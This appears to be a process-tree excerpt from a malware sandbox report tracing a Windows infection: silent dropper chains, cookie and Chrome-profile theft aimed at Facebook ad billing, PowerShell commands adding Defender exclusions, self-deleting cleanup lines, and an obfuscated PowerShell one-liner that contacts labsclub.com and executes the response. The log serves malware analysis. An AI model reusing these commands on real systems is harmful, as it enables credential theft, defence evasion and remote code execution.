C:\Users\Admin\AppData\Local\Temp\is-ET942.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-ET942.tmp\Delta.tmp" /SL5="$206AE,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-KA873.tmp\Delta.exe" /Verysilent19⤵
-
C:\Users\Admin\AppData\Local\Temp\is-L0NTV.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-L0NTV.tmp\Setup.exe" /VERYSILENT20⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-L0NTV.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit21⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f22⤵
- Kills process with taskkill
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-KA873.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-KA873.tmp\zznote.exe" /Verysilent18⤵
-
C:\Users\Admin\AppData\Local\Temp\is-G09E2.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-G09E2.tmp\zznote.tmp" /SL5="$306AE,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-KA873.tmp\zznote.exe" /Verysilent19⤵
-
C:\Users\Admin\AppData\Local\Temp\is-JRON6.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-JRON6.tmp\jg4_4jaa.exe" /silent20⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-KA873.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-KA873.tmp\hjjgaa.exe" /Verysilent18⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt19⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt19⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bihlrbu3fjj\coatkfuxtvi.exe"C:\Users\Admin\AppData\Local\Temp\bihlrbu3fjj\coatkfuxtvi.exe" /ustwo INSTALL14⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7236 -s 65615⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7236 -s 67215⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7236 -s 69615⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7236 -s 81215⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7236 -s 90815⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7236 -s 94415⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7236 -s 110015⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\qacx1gs4fgo\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\qacx1gs4fgo\askinstall24.exe"14⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe15⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe16⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y15⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7fff7d126e00,0x7fff7d126e10,0x7fff7d126e2016⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=2272 /prefetch:816⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2712 /prefetch:116⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2704 /prefetch:116⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3520 /prefetch:116⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3736 /prefetch:116⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:116⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:116⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1720 /prefetch:816⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1672 /prefetch:216⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=4812 /prefetch:816⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4628 /prefetch:116⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4812 /prefetch:116⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=5676 /prefetch:816⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=5348 /prefetch:816⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=5916 /prefetch:816⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1396 /prefetch:116⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:116⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1756 /prefetch:116⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1660,13796228802531025583,6802563485927971618,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=5744 /prefetch:816⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nt5w2h5uri5\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\nt5w2h5uri5\chashepro3.exe" /VERYSILENT14⤵
-
C:\Users\Admin\AppData\Local\Temp\is-HQKQC.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-HQKQC.tmp\chashepro3.tmp" /SL5="$501EE,2015144,58368,C:\Users\Admin\AppData\Local\Temp\nt5w2h5uri5\chashepro3.exe" /VERYSILENT15⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\v3jq22dmihw\vpn.exe"C:\Users\Admin\AppData\Local\Temp\v3jq22dmihw\vpn.exe" /silent /subid=48214⤵
-
C:\Users\Admin\AppData\Local\Temp\is-6OM0N.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-6OM0N.tmp\vpn.tmp" /SL5="$30512,15170975,270336,C:\Users\Admin\AppData\Local\Temp\v3jq22dmihw\vpn.exe" /silent /subid=48215⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\qn1ucqtkcdx\vict.exe"C:\Users\Admin\AppData\Local\Temp\qn1ucqtkcdx\vict.exe" /VERYSILENT /id=53514⤵
-
C:\Users\Admin\AppData\Local\Temp\is-PG78Q.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-PG78Q.tmp\vict.tmp" /SL5="$50492,870426,780800,C:\Users\Admin\AppData\Local\Temp\qn1ucqtkcdx\vict.exe" /VERYSILENT /id=53515⤵
-
C:\Users\Admin\AppData\Local\Temp\is-HDCH8.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-HDCH8.tmp\wimapi.exe" 53516⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\v3k2dwkfqpf\app.exe"C:\Users\Admin\AppData\Local\Temp\v3k2dwkfqpf\app.exe" /8-2314⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Misty-Darkness"15⤵
-
-
C:\Program Files (x86)\Misty-Darkness\7za.exe"C:\Program Files (x86)\Misty-Darkness\7za.exe" e -p154.61.71.51 winamp-plugins.7z15⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Misty-Darkness\app.exe" -map "C:\Program Files (x86)\Misty-Darkness\WinmonProcessMonitor.sys""15⤵
-
C:\Program Files (x86)\Misty-Darkness\app.exe"C:\Program Files (x86)\Misty-Darkness\app.exe" -map "C:\Program Files (x86)\Misty-Darkness\WinmonProcessMonitor.sys"16⤵
-
-
-
C:\Program Files (x86)\Misty-Darkness\7za.exe"C:\Program Files (x86)\Misty-Darkness\7za.exe" e -p154.61.71.51 winamp.7z15⤵
-
-
C:\Program Files (x86)\Misty-Darkness\app.exe"C:\Program Files (x86)\Misty-Darkness\app.exe" /8-2315⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\o2b5v1te02p\safebits.exe"C:\Users\Admin\AppData\Local\Temp\o2b5v1te02p\safebits.exe" /S /pubid=1 /subid=45114⤵
-
-
C:\Users\Admin\AppData\Local\Temp\c5xx4sxjmrk\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\c5xx4sxjmrk\askinstall24.exe"14⤵
-
-
C:\Users\Admin\AppData\Local\Temp\om2ckhzj15i\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\om2ckhzj15i\Setup3310.exe" /Verysilent /subid=57714⤵
-
-
C:\Users\Admin\AppData\Local\Temp\zkdaarhbvsw\safebits.exe"C:\Users\Admin\AppData\Local\Temp\zkdaarhbvsw\safebits.exe" /S /pubid=1 /subid=45114⤵
-
-
C:\Users\Admin\AppData\Local\Temp\wjcim4px1fs\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\wjcim4px1fs\chashepro3.exe" /VERYSILENT14⤵
-
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s3z1yeks.t20\setup.exe /8-2222 & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\s3z1yeks.t20\setup.exeC:\Users\Admin\AppData\Local\Temp\s3z1yeks.t20\setup.exe /8-222210⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Dry-Tree"11⤵
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-1AEOA.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-1AEOA.tmp\Delta.exe" /Verysilent3⤵
-
C:\Users\Admin\AppData\Local\Temp\is-88542.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-88542.tmp\Delta.tmp" /SL5="$404B2,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-1AEOA.tmp\Delta.exe" /Verysilent4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-6VR44.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-6VR44.tmp\Setup.exe" /VERYSILENT5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-6VR44.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f7⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 67⤵
- Delays execution with timeout.exe
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-1AEOA.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-1AEOA.tmp\zznote.exe" /Verysilent3⤵
-
C:\Users\Admin\AppData\Local\Temp\is-CDA09.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-CDA09.tmp\zznote.tmp" /SL5="$80226,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-1AEOA.tmp\zznote.exe" /Verysilent4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-9MHVR.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-9MHVR.tmp\jg4_4jaa.exe" /silent5⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-1AEOA.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-1AEOA.tmp\hjjgaa.exe" /Verysilent3⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-RUC1A.tmp\winlthst.exe"C:\Users\Admin\AppData\Local\Temp\is-RUC1A.tmp\winlthst.exe" test1 test11⤵
-
C:\Users\Admin\AppData\Local\Temp\Bl7929G0y.exe"C:\Users\Admin\AppData\Local\Temp\Bl7929G0y.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Bl7929G0y.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Bl7929G0y.exe" & del C:\ProgramData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Bl7929G0y.exe /f4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"3⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Shy-Morning"1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-V8L7L.tmp\moyah0k4v2a.tmp"C:\Users\Admin\AppData\Local\Temp\is-V8L7L.tmp\moyah0k4v2a.tmp" /SL5="$30232,404973,58368,C:\Users\Admin\AppData\Roaming\uixypn1nshu\moyah0k4v2a.exe" /VERYSILENT /p=testparams1⤵
-
C:\Program Files (x86)\JCleaner\8.exe"C:\Program Files (x86)\JCleaner\8.exe"1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Nemica.sys2⤵
-
C:\Windows\SysWOW64\cmd.execmd3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1EaGq7"1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-I03FN.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-I03FN.tmp\IBInstaller_97039.tmp" /SL5="$303E0,14452723,721408,C:\Users\Admin\AppData\Local\Temp\aespuai3xt5\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SFUKC.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-SFUKC.tmp\chashepro3.tmp" /SL5="$10234,2015144,58368,C:\Users\Admin\AppData\Local\Temp\si5vnkqhco4\chashepro3.exe" /VERYSILENT1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{4d3236e3-12c3-5147-875d-cd75be2bc02b}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"2⤵
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\cd42c6369c4241c9955d1c55e2f7c310 /t 0 /p 52681⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
